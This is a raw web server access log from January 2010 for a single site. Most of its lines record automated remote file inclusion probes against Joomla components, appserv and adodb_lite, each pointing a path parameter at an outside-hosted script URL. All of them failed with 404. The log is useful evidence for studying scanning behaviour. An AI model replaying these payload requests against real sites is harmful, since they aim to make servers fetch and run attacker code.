79.170.45.126 - - [11/Jan/2010:01:34:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:34:48 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:34:48 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:34:49 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:01:34:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:01:34:54 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [11/Jan/2010:01:34:54 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.160 - - [11/Jan/2010:01:35:08 -0800] "GET / HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:35:09 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:35:09 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:35:14 -0800] "GET /logs/access_091221.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:35:45 -0800] "GET /logs/access_091019.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:35:55 -0800] "GET /logs/access_091019.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:36:37 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:36:37 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:36:37 -0800] "GET /logs/access_090831.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:37:13 -0800] "GET /logs/access_090907.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:01:37:38 -0800] "GET /logs/access_091207.log%20%20/error.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:01:37:38 -0800] "GET /error.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:01:37:38 -0800] "GET /logs/error.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:01:39:35 -0800] "GET /logs/access_091123.log%20%20/error.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:40:16 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:40:16 -0800] "GET /logs/access_090525.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:40:16 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:40:22 -0800] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:40:44 -0800] "GET /logs/access_090525.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:40:44 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:40:44 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:42:30 -0800] "GET /logs/access_090831.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:42:59 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:42:59 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [11/Jan/2010:01:42:59 -0800] "GET /logs/access_090629.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [11/Jan/2010:01:43:08 -0800] "GET /logs/access_100104.log/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:43:18 -0800] "GET /logs/access_091116.log//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:43:18 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:43:18 -0800] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:43:59 -0800] "GET /logs/access.log//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:44:30 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:44:30 -0800] "GET /logs/access_091207.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:44:30 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [11/Jan/2010:01:44:40 -0800] "GET /logs/access.log/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:44:46 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:44:52 -0800] "GET /logs/access_091109.log//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:44:52 -0800] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:44:52 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:45:06 -0800] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:45:06 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:45:06 -0800] "GET /logs/access.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:45:07 -0800] "GET /logs/access_091116.log%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:01:45:15 -0800] "GET /logs/access_090831.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:01:45:15 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:01:45:15 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:45:17 -0800] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:45:17 -0800] "GET /logs/access.log//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:45:17 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [11/Jan/2010:01:45:17 -0800] "GET /logs/access_100104.log//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:45:22 -0800] "GET /logs/access_091207.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:45:22 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:45:22 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:01:45:44 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:01:45:51 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:01:45:51 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:01:45:51 -0800] "GET /logs/access_091214.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:01:45:52 -0800] "GET /logs/access_090921.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:01:46:17 -0800] "GET /logs/access_091214.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:01:46:17 -0800] "GET /logs/access_090921.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [11/Jan/2010:01:49:14 -0800] "GET /logs/access_091116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ngamc.com//modules/Forums/admin/bash/icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [11/Jan/2010:01:49:14 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ngamc.com//modules/Forums/admin/bash/icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [11/Jan/2010:01:49:14 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ngamc.com//modules/Forums/admin/bash/icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.216.53 - - [11/Jan/2010:01:50:21 -0800] "GET /?D=A HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
77.221.130.13 - - [11/Jan/2010:01:50:45 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bla-squad.co.uk/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [11/Jan/2010:01:50:45 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bla-squad.co.uk/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [11/Jan/2010:01:50:45 -0800] "GET /logs/access_091116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bla-squad.co.uk/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [11/Jan/2010:01:54:40 -0800] "GET /logs/access_091116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [11/Jan/2010:01:54:40 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [11/Jan/2010:01:54:40 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [11/Jan/2010:01:54:40 -0800] "GET /logs/access_091116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [11/Jan/2010:01:54:40 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [11/Jan/2010:01:54:40 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.218.111.39 - - [11/Jan/2010:01:56:02 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.218.111.39 - - [11/Jan/2010:01:56:02 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.218.111.39 - - [11/Jan/2010:01:56:02 -0800] "GET /logs/access_090824.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.218.111.39 - - [11/Jan/2010:01:56:07 -0800] "GET /logs/access_090706.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:01:56:16 -0800] "GET /logs/access_090713.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:01:56:16 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:01:56:16 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:01:56:24 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:01:56:24 -0800] "GET /logs/access_090713.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:01:56:24 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:36 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:36 -0800] "GET /logs/access.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:36 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:36 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:36 -0800] "GET /logs/access.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:36 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:36 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:36 -0800] "GET /logs/access_100104.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:36 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:36 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:36 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:36 -0800] "GET /logs/access_100104.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:37 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:37 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:37 -0800] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:37 -0800] "GET /logs/access_100104.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:37 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:37 -0800] "GET /logs/access.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [11/Jan/2010:01:56:37 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
